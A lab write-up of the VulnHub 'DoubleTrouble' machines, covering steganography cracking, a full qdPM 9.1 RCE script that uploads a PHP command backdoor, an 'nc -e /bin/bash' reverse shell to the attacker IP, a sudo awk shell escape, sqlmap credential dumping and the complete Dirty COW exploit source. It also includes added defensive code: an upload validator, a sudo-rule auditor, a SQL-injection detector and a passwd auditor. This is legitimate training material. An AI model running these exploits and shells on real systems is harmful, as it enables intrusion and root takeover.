Vulnhub range double trouble
2022-07-27 23:03:00 【KALC】
1、 Target information
Target name: DoubleTrouble
Target difficulty: intermediate
Virtual machine environment: VirtualBox is recommended for this target
Goal: obtain root privileges and the flag
Target address: https://download.vulnhub.com/doubletrouble/doubletrouble.ova
Kali attacker IP: 192.168.189.4
Target machine 1 IP: 192.168.189.5
Target machine 2 IP: 192.168.189.6
2、 Target machine 1
2.1 Host discovery
2.1.1 First use the ARP protocol for host discovery; the target IP is found to be 192.168.189.5
sudo arp-scan -l

2.1.2 Run an Nmap port scan against the target IP; ports 22 and 80 are open
nmap -p- 192.168.189.5

2.1.3 Identify the service versions on the open ports: port 22 is OpenSSH 7.9p1, port 80 is Apache 2.4.38, and the target runs Debian
nmap -p 22,80 -sV 192.168.189.5

2.2 Web information gathering
2.2.1 Browsing to port 80 shows the open-source CMS in use and its version: qdPM 9.1

2.2.2 Use dirsearch to enumerate web directories on the target site
dirsearch -u http://192.168.189.5 -e *
Notes on the enumerated directories:
no content
nothing useful
nothing useful
nothing useful
a database account and password can be created here
nothing useful
contains a picture
nothing useful
nothing useful

2.3 Image steganography
2.3.1 Download the picture from the secret directory; since the directory is called secret, the picture is suspected to contain hidden data
http://192.168.189.5/secret/doubletrouble.jpg

2.3.2 Read the image's embedded-data info with steghide; it asks for a passphrase, which further confirms that something is hidden in this picture
steghide info doubletrouble.jpg

2.3.3 Brute-force the passphrase with stegseek; the password is 92camaro, and the extracted data is written to a file named file
stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf file

2.3.4 Open the extracted file named file; it contains text that looks like a set of credentials
otis666

2.3.5 Log in to the system successfully with the credentials above

2.4 Using the exploit code
2.4.1 Searching Exploit-DB for qdPM 9.1 turns up an authenticated RCE vulnerability. The downloaded code cannot be used as-is because several line breaks are broken; the version I fixed up is below
Exploit page: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
#!/usr/bin/python3
import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()


def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    # Profile-update form; photo_preview names the existing photo the server will remove
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                 files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php',
                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo"<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
                         , 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME +
                                       'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    url = HOSTNAME + '/index.php/login'
    result = session_requests.get(url)
    #print(result.text)
    login_tree = html.fromstring(result.text)
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
               'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login',
                                   data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    # The designated admin account does not have a myAccount page
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = final_tree.xpath("//input[@name='users[photo_preview]']/@value")
    print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +
          backdoor[-1] + '?cmd=whoami')


if __name__ == '__main__':
    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email(Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    # Added detection if the arguments are passed and populated, if not display the arguments
    if (len(sys.argv) > 1 and isinstance(args.hostname, str) and
            isinstance(args.email, str) and isinstance(args.password, str)):
        main(args.hostname, args.email, args.password)
    else:
        parser.print_help()

2.4.2 Run the exploit; the script reports that the backdoor has been uploaded to http://192.168.189.5//uploads/users/?cmd=whoami
python 50175.py -url http://192.168.189.5/ -u [email protected] -p otis666

2.4.3 Browsing to the uploads directory shows the backdoor PHP file
http://192.168.189.5//uploads/users/?cmd=whoami

2.4.4 Remote commands can be executed directly; next we try to obtain a reverse shell
http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=id

2.4.5 Use nc to get a reverse shell directly
kali: nc -nvlp 9999
target: http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=nc -e /bin/bash 192.168.189.4 9999
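The exploit above works because the profile-update handler trusts two client-controlled values: users[photo_preview] names the file to delete (so ".htaccess" and "../.htaccess" remove the rules that stop PHP from executing under uploads/), and users[photo] is stored with whatever extension the client sends. The following is an added example of how such an upload handler can be hardened; it is not qdPM's code, and the upload root, the allowed image types and the function names are assumptions made for this illustration.

```python
import secrets
from pathlib import Path
from typing import Optional

# Constructed upload root for this example; qdPM's real layout is assumed, not copied.
UPLOAD_ROOT = Path("/var/www/html/uploads/users")

# Profile photos are images; nothing else (.php, .phtml, .htaccess, ...) is ever stored here.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes of the accepted formats, so a ".png" that is really PHP text is rejected.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def resolve_within_root(root: Path, user_supplied: str) -> Optional[Path]:
    """Map a client-supplied name (e.g. the old photo to remove) to a path under root.

    Returns None when the name must not be honoured. The vulnerable handler skips
    this check: it unlinks whatever photo_preview says, so ".htaccess" and
    "../.htaccess" delete the files that keep PHP from executing in uploads/.
    """
    if not user_supplied:
        return None
    # Any separator means the client is naming a directory, not a file of its own.
    if "/" in user_supplied or "\\" in user_supplied or user_supplied in (".", ".."):
        return None
    # Server configuration lives in dotfiles; a user never owns one.
    if user_supplied.startswith("."):
        return None
    root_resolved = root.resolve()
    candidate = (root_resolved / user_supplied).resolve()
    # After symlink resolution the file must still sit directly inside the root.
    if candidate.parent != root_resolved:
        return None
    return candidate


def validate_upload(original_name: str, content: bytes) -> Optional[str]:
    """Return a server-chosen storage name for an acceptable photo, else None.

    The client's base name is discarded entirely; only its extension is consulted,
    and the stored name is random, so "backdoor.php" can never land on disk as such.
    """
    ext = Path(original_name).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    if not content.startswith(MAGIC[ext]):
        return None
    return secrets.token_hex(8) + ext
```

Keeping PHP execution disabled in the upload directory at the web-server level is still worthwhile, but as the exploit shows it is only a second line of defence when the application itself can be talked into deleting that configuration.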

2.5 Privilege escalation via awk
2.5.1 Run sudo -l to see which commands may be run with sudo; awk turns out to be runnable via sudo
sudo -l

2.5.2 Look up the awk command on the reference website to see whether there is a privilege escalation method; choose the sudo variant and find the escalation payload


2.5.3 Use the escalation command to successfully become root
sudo awk 'BEGIN {system("/bin/sh")}'
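A sudoers entry for awk is only one instance of a broader class: any binary that can spawn a shell or write arbitrary files gives root when it may be run via sudo. The following is an added audit helper, not part of this writeup or of sudo, that parses the rule lines of "sudo -l" output and flags such binaries. The sample output is constructed for the example (the page only says awk could be run with sudo and does not show the listing), and the set of shell-capable binaries is an assumed subset of the well-known list.

```python
import re
from typing import Dict, List

# Binaries that spawn a shell, run arbitrary commands or write arbitrary files when
# run as root. Assumed subset for this example; a real audit would use a fuller list.
SHELL_CAPABLE = {
    "awk", "gawk", "mawk", "nawk", "bash", "sh", "dash", "zsh", "env", "find",
    "vim", "vi", "nano", "less", "more", "man", "perl", "python", "python2",
    "python3", "ruby", "tar", "zip", "nmap", "tee", "cp", "mv", "dd",
}

# Constructed "sudo -l" output in the shape sudo prints it.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target:
    env_reset, mail_badpass

User www-data may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/systemctl restart apache2, /usr/bin/systemctl status apache2
"""

# One rule line: "(runas) [TAG: ...] command [args][, command [args] ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT"
    r"|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Parse the rule lines of "sudo -l" into (runas, nopasswd, command) records."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in text.splitlines():
        # Rules start after the "User X may run the following commands" header.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        nopasswd = False
        # Peel off any tag prefixes such as "NOPASSWD:" or "SETENV:".
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            nopasswd = nopasswd or rest.startswith("NOPASSWD")
            rest = rest[t.end():]
        # Several commands may share one rule, separated by commas.
        for command in rest.split(","):
            command = command.strip()
            if command:
                rules.append({"runas": m.group("runas").strip(),
                              "nopasswd": nopasswd, "command": command})
    return rules


def flag_shell_capable(rules: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the rules whose binary is known to yield a shell or arbitrary write."""
    flagged = []
    for r in rules:
        binary = str(r["command"]).split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE or r["command"] == "ALL":
            flagged.append(dict(r, binary=binary))
    return flagged


def audit_sudo_l(text: str) -> List[Dict[str, object]]:
    return flag_shell_capable(parse_sudo_l(text))


if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{finding['runas']}: {finding['command']} (binary {finding['binary']}, "
              f"NOPASSWD={finding['nopasswd']})")
```

The rule granting systemctl with fixed arguments is deliberately not flagged: the audit looks at the binary, not at whether the arguments are constrained, so a second pass over flagged entries is still needed before concluding that a rule is safe.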

2.5.4 In the root directory another .ova virtual machine file is found

2.5.5 Download the ova file locally and import it into VirtualBox
target: python3 -m http.server 8088
kali: wget http://192.168.189.5:8088/doubletrouble.ova


3、 Target machine 2
3.1 Host discovery
3.1.1 As above, use the ARP protocol for host discovery
sudo arp-scan -l

3.1.2 Port discovery with nmap
nmap -p- 192.168.189.6

3.1.3 Service version detection on the open ports
nmap -p 22,80 -sV 192.168.189.6

3.2 SQL injection
3.2.1 Port 80 serves a login page

3.2.2 As usual, run dirsearch, but no directories are found
dirsearch -u http://192.168.189.6 -e *

3.2.3 Test with sqlmap; it finds a time-based injection point, which is reproduced successfully in Burp, confirming the vulnerability
sqlmap -u http://192.168.189.6 --forms



3.2.4 Enumerate the databases; two are returned, doubletrouble and information_schema
sqlmap -u http://192.168.189.6 --batch --forms --dbs

3.2.5 Enumerate the tables of that database; a users table is found
sqlmap -u http://192.168.189.6 --batch --forms -D doubletrouble --tables

3.2.6 Dump the columns of the users table; two sets of credentials are found
sqlmap -u http://192.168.189.6 --batch --forms -D doubletrouble -T users --dump
username: montreux  password: GfsZxc1
username: clapton   password: ZubZub99

3.2.7 Neither set of credentials works on the web login page; over ssh only clapton/ZubZub99 can log in
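The login form falls to sqlmap because user input is concatenated into the SQL statement. The following added example (not the target application's code) shows that pattern beside the parameterized form, using an in-memory SQLite table with constructed users, and a small log check for the sqlmap User-Agent; the tautology payload is the boolean-based variant of what sqlmap tried, the time-based variant the page reports differs only in the probe expression. Passwords are kept in plaintext purely to keep the demo short; a real table stores hashes.

```python
import sqlite3
from typing import List, Optional

# Constructed sample users; not the rows from the target's database.
SAMPLE_USERS = [("alice", "constructed-pw-1"), ("bob", "constructed-pw-2")]

# Boolean-based probe: comments out the password check and makes the WHERE true.
TAUTOLOGY = "' OR 1=1 -- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def render_vulnerable_query(username: str, password: str) -> str:
    """The string the vulnerable handler hands to the database; input becomes syntax."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    row = conn.execute(render_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Bound parameters: the input is data only and is never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Constructed Apache access-log lines; sqlmap identifies itself in its default User-Agent.
SAMPLE_ACCESS_LOG = [
    '192.168.189.4 - - [27/Jul/2022:23:03:00 +0800] "POST /index.php HTTP/1.1" 200 512 "-" '
    '"sqlmap/1.6 (https://sqlmap.org)"',
    '192.168.189.4 - - [27/Jul/2022:23:03:01 +0800] "GET /index.php?user=admin%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
    '192.168.189.4 - - [27/Jul/2022:23:03:02 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

SQL_MARKERS = ("SLEEP(", "BENCHMARK(", "%27%20OR%20", "%27%20AND%20", "UNION%20SELECT")


def suspicious_log_lines(lines: List[str]) -> List[str]:
    """Flag lines carrying the sqlmap User-Agent or injection markers in the request."""
    hits = []
    for line in lines:
        if "sqlmap" in line.lower():
            hits.append(line)
            continue
        request = line.split('"')[1] if line.count('"') >= 2 else ""
        if any(marker in request.upper() for marker in SQL_MARKERS):
            hits.append(line)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable  :", login_vulnerable(db, TAUTOLOGY, "anything"))
    print("parameterized:", login_parameterized(db, TAUTOLOGY, "anything"))
    for hit in suspicious_log_lines(SAMPLE_ACCESS_LOG):
        print("suspicious:", hit)
```

The User-Agent check only catches a scanner run with defaults, since the agent string is trivially changed; the marker check on the request line is the more durable signal, and for POST forms like this one it needs the request body, which the access log does not record.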

3.3 Dirty COW privilege escalation
3.3.1 Check which commands the clapton user can run with sudo; there are no sudo privileges. A flag is found in the user's home directory
flag:6CEA7A737C7C651F6DA7669109B5FB52

3.3.2 Check the kernel version; it is 3.2.0, which is affected by the Dirty COW privilege escalation vulnerability
uname -a

3.3.3 Download the exploit file
GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
kali: python3 -m http.server 80
target: wget http://192.168.189.4/dirty.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh [email protected]"
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
#include <signal.h>   // for kill()/SIGSTOP; missing in the pasted copy

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
  char *username;
  char *hash;
  int user_id;
  int group_id;
  char *info;
  char *home_dir;
  char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
  return NULL;
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  int ch;   // int rather than char, so EOF is not confused with byte 0xFF
  FILE *source, *target;

  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");

  if(target == NULL) {
    fclose(source);
    return -1;
  }

  while((ch = fgetc(source)) != EOF) {
    fputc(ch, target);
  }

  printf("%s successfully backed up to %s\n",
    from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}

3.3.4 After compiling and running it, a root-privileged user firefart is created
gcc -pthread dirty.c -o dirty -lcrypt
./dirty root
username: firefart
password: root
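What the exploit leaves behind is visible in /etc/passwd itself: the generated line is written over the start of the file, so the root entry disappears, a second uid 0 account appears with its hash stored directly in passwd rather than shadow, and the bytes of the next entry that were overrun turn into a malformed line. The following added audit script (not part of this writeup or of the exploit) parses a passwd file, reports those conditions, and diffs it against a baseline such as the /tmp/passwd.bak the exploit writes. Both file contents are constructed for the example, and the 13-character hash is a placeholder of the right length, not a real crypt output.

```python
from typing import Dict, List, Optional, Tuple

# Constructed baseline, as the exploit's backup would contain it.
PASSWD_BEFORE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
clapton:x:1000:1000:clapton,,,:/home/clapton:/bin/bash
"""

# Constructed result: the 49-byte generated line overwrote the 32-byte root line and
# the first 17 bytes of the daemon line, leaving a truncated fragment behind it.
PASSWD_AFTER = """\
firefart:fiPLACEHOLDER:0:0:pwned:/root:/bin/bash
on:/usr/sbin:/usr/sbin/nologin
clapton:x:1000:1000:clapton,,,:/home/clapton:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
# Values in the password field that mean "look in /etc/shadow" or "locked".
SHADOW_MARKERS = ("x", "*", "!", "!!", "")


def parse_passwd(text: str) -> Tuple[List[Dict[str, object]], List[str]]:
    """Split passwd text into well-formed entries and the raw lines that are not."""
    entries: List[Dict[str, object]] = []
    malformed: List[str] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            malformed.append(line)
            continue
        entry: Dict[str, object] = dict(zip(FIELDS, parts))
        entry["uid"] = int(parts[2])
        entry["gid"] = int(parts[3])
        entries.append(entry)
    return entries, malformed


def audit_passwd(text: str, baseline: Optional[str] = None) -> List[str]:
    """Return human-readable findings for a passwd file, optionally diffed against a baseline."""
    findings: List[str] = []
    entries, malformed = parse_passwd(text)
    for line in malformed:
        findings.append(f"malformed line: {line!r}")
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"uid 0 account other than root: {e['name']}")
        if e["passwd"] not in SHADOW_MARKERS:
            findings.append(f"password hash stored in passwd instead of shadow: {e['name']}")
    names = {str(e["name"]) for e in entries}
    if "root" not in names:
        findings.append("root entry missing")
    if baseline is not None:
        base_names = {str(e["name"]) for e in parse_passwd(baseline)[0]}
        for n in sorted(names - base_names):
            findings.append(f"account added since baseline: {n}")
        for n in sorted(base_names - names):
            findings.append(f"account removed since baseline: {n}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER, PASSWD_BEFORE):
        print(finding)
```

Run against a live system, the same function would take the contents of /etc/passwd and, where one exists, the saved copy; a scheduled comparison against a known-good copy catches this class of change even when the kernel-level exploit itself leaves no log entry.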

3.3.5 Switch to the firefart user; this user is in the root group
su firefart

3.3.6 Read the flag in the root directory
flag:1B8EEA89EA92CECB931E3CC25AA8DE21
